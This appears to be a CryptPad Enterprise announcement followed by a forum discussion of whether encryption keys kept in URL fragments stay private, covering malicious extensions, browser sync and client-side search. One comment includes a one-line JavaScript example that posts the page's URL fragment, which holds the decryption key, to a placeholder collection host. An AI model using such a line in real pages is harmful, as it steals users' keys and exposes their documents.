Most online collaboration tools ask you to trust them with your data. Google Docs and Microsoft 365 store your files on their servers, scan your content, and build profiles on users. CryptPad does the opposite. It’s a real-time document editor where everything is encrypted—only you and your team can see what you write. Not even the server can read your files.
Now, we’re bringing that same privacy-first approach to businesses with CryptPad Enterprise. It’s a self-hosted, end-to-end encrypted alternative to Big Tech’s office suites, designed for teams that care about privacy, security, and data sovereignty. With governments and companies across Europe looking for ways to move away from US-based cloud services, solutions like this are becoming more relevant.
We’re hosting a webinar to talk about how it works, the technical challenges of scaling encrypted collaboration, and what’s next. If you’re interested in privacy-first infrastructure, join us:
But isn't the key just in the URL? If the key is sent to the servers in any way, it can be used to decrypt and read the files. I'm not sure that this achieves anything more than a pinky promise of "we won't read your files", because when push comes to shove the keys will be logged and turned over to the authorities.
I haven't used the product, but if the key is in the fragment portion of the URL then it's not sent to the server. This is a pretty common pattern for these e2e encrypted web apps.
> The fragment of a URI is the last part of the URI, starting with the # character. It is used to identify a specific part of the resource, such as a section of a document or a position in a video. The fragment is not sent to the server when the URI is requested, but it is processed by the client (such as the browser) after the resource is retrieved.
https://developer.mozilla.org/en-US/docs/Web/URI/Reference/F...
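To illustrate the pattern (hypothetical URL and key name, not CryptPad's actual scheme): the server only ever sees the path portion of the request, and the page's own script reads the secret out of `location.hash` after loading.

```js
// A link like https://pad.example.com/doc/42#key=BASE64KEY
// sends only "GET /doc/42" to the server; the "#key=..." part
// never leaves the browser.
async function openDocument() {
  // Read the key from the fragment, client-side only.
  const fragment = window.location.hash.slice(1); // "key=BASE64KEY"
  const key = new URLSearchParams(fragment).get("key");

  // Fetch the ciphertext from the server and decrypt it locally,
  // e.g. with the WebCrypto API (decryption details elided).
  const ciphertext = await fetch("/doc/42/blob").then((r) => r.arrayBuffer());
  // ... crypto.subtle.importKey / crypto.subtle.decrypt using `key` ...
}
```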
Couldn't on-page JavaScript read the fragment and send that to an endpoint?
On-page JavaScript could just read the locally decrypted content regardless of how the decryption keys are managed; the key being in the URL doesn't change anything.
You have to trust the server not to serve a page that will exfiltrate the decrypted data with JavaScript (and why wouldn't you, if it's self-hosted).
Though I'm not sure exfiltration is actually prevented, since extension scripts can still run in the page context.
If you have compromised browser extensions with script-injection access, it's game over, security-wise, for any site you visit.
As a sidenote, that's actually one significant benefit of the "Manifest V3" Web Extension model – it's possible to grant these permissions on a per-site basis. (For example, you can allow uBlock Lite script injection access only on some sites, and limit it to declarative network request blocking otherwise.)
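Roughly, from the extension side it looks like this (a sketch using Chrome's `permissions` and `scripting` APIs; the origin is a placeholder): hosts are declared as optional in the MV3 manifest, and the user grants script access one origin at a time.

```js
// manifest.json (MV3) declares hosts as optional rather than blanket:
//   "optional_host_permissions": ["https://*/*"],
//   "permissions": ["scripting"]
async function enableOnSite(tabId) {
  // Prompts the user to grant access to this one origin only
  // (must be called from a user gesture).
  const granted = await chrome.permissions.request({
    origins: ["https://docs.example.com/*"], // placeholder origin
  });
  if (granted) {
    await chrome.scripting.executeScript({
      target: { tabId },
      files: ["content.js"],
    });
  }
}
```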
I think you missed the point they were making.
When you go to, say, Google Docs, you're retrieving JS from servers that are _not_ yours. That JS (theoretically) can be altered to send unencrypted data back to Google Docs.
The point they were making is that in this scenario you've self-hosted the JS, so it's not going to be altered to send back unencrypted data, because you yourself aren't going to make that alteration.
---
Sure, in both scenarios it doesn't matter if you have an extension that uploads the content of the page, but more threat scenarios apply to JS served from someone else's server than from your own.
They mentioned extensions though, and I made a comment on that specific attack vector.
Above commenter got it exactly right. Yes, if you've installed extensions with malicious code, your data anywhere can be exfiltrated.
That is one of the privacy dangers of CryptPad, and it's not particularly far-fetched. Specifically with shared documents: for an assurance that only approved people will see a doc, one needs to trust every extension installed by every user who visits it.
Of course this is a browser-based consideration that would affect shared docs on any browser-based platform, but for a privacy-focused app I think it's fair to consider the modes of failure inherent in being a browser-based app. Signal and other desktop applications, by contrast, wouldn't have these same risks (and CryptPad could similarly bundle its client as an Electron-based app to provide better security).
It doesn't seem to be.
Do you have an example? As per their docs, they do put the encryption key after the '#': https://github.com/cryptpad/cryptpad/blob/main/docs/ARCHITEC...
Oh, I wasn't aware that slashes can follow the '#'. In that case it seems to be. Thanks for the correction. So the only concern here is injecting JS to exfiltrate the key, then.
CryptPad (the non-enterprise version, anyway) puts the encryption key for its document links in the URL fragment (after the '#'), which means it doesn't get sent to the servers.
However, anyone using a browser like Chrome, Safari, or Edge with cloud syncing enabled will be sending this URL to the respective browser vendor, which means you're still handing over the documents to Google (or Apple, or Microsoft).
Safari's and Chrome's (and Firefox's!) cloud syncing is e2e encrypted, so you should not be handing over anything to Apple or Google. I haven't looked into Edge/Microsoft's solution, but I would hope they e2e encrypt as well.
Edit: Actually, I just looked and can't find any information indicating Edge sync is e2e encrypted except for enterprise accounts. So beware of that browser if you weren't already.
Is that true by default for Chrome?
Safari does use different types of encryption for open tabs and history vs. bookmarks (the former E2E, the latter depending on whether the account is using ADP), and I believe Firefox is completely E2E by default (based on the Mozilla account password), but I can't find a detailed description of what Chrome does.
Specifically, enabling Chrome's end-to-end sync encryption opts the account out of history sync. I can't think of any reasonable explanation for that other than Google wanting to discourage its use.
You can request your Chrome history from Google Takeout; I don't see how this is possible if they don't have access to your browser history.
Edit: it looks like e2ee is an option, though it's not the default, and Google goes out of their way to make this inconvenient for users: https://palant.info/2023/08/29/chrome-sync-privacy-is-still-...
But unless you're able to ensure that all users of your CryptPad documents have e2ee configured with a strong password, it's likely that Google will see the URLs with decryption keys to your CryptPad docs. It only takes one weak link...
It's trivial for the host to inject some JavaScript that reads the fragment and phones home.
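The whole payload could be on the order of this (hypothetical collection endpoint):

```js
// One line, served (or injected) just once, is enough:
fetch("https://collect.example.com/keys", {
  method: "POST",
  body: location.hash, // contains the document's decryption key
});
```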
The FISA request writes itself.
Oh sure, if you're running malicious code in the browser already then Cryptpad can't protect you.
I'm saying that in addition to this, Google, Microsoft, and Apple will be able to read your CryptPad documents, because they'll have the URL with the decryption key. The only thing putting the key in the fragment portion of the URL accomplishes is ensuring that the CryptPad server itself (which you control anyway if you're self-hosting) can't access the data.
How does search work, if the files are unreadable?
What do you do about copyright or CSAM?
Why would E2EE hinder search? Any client could build or update the search index. (Rough sketch below.)
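As a rough sketch of what client-side search could look like (not CryptPad's actual API; the encryption step is elided): each client tokenizes the plaintext it has already decrypted, maintains a word-to-document-ID index, and encrypts the serialized index before syncing it back, so the server stores only ciphertext.

```js
// Build a word -> Set<docId> index over already-decrypted documents.
function buildIndex(docs) { // docs: [{ id, plaintext }]
  const index = new Map();
  for (const { id, plaintext } of docs) {
    for (const word of plaintext.toLowerCase().split(/\W+/)) {
      if (!word) continue;
      if (!index.has(word)) index.set(word, new Set());
      index.get(word).add(id);
    }
  }
  return index;
}

// Look up a single term; returns the set of matching document IDs.
function search(index, term) {
  return index.get(term.toLowerCase()) ?? new Set();
}

// Before syncing, serialize and encrypt the index itself, so the
// server never sees plaintext search terms.
```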
Because that's a job for the service, not the client.
If the client needs to implement the search index on its own, why even have a service? What benefit does the service bring?
If I need to host the search index myself, that makes a much more vulnerable target for surveillance or attack, compared to a centralized service which has a dedicated security/privacy team. I would need to roll my own security, or trust the vendor. We are back to square one.
Says who?
Just because that's the easiest solution if you already have the data unencrypted on the server side doesn't mean it's the only one.
> What benefit does the service bring?
It allows synchronization between clients, online collaboration, and serves as an automatic backup. That's basically everything I want from most document cloud services!
Because it provides the critical part called "hosting": everyone is constantly told by ads that they're too moronic to set up their own. "Send your data to us! And pay us! LOL"
Just wait for some fuck-up story, or news that the data wasn't actually encrypted on the provider's end. Yes, that has already happened with at least one "encryption provider".
Or maybe teach managers to do routine darknet checks to see whether their data is already there? :>>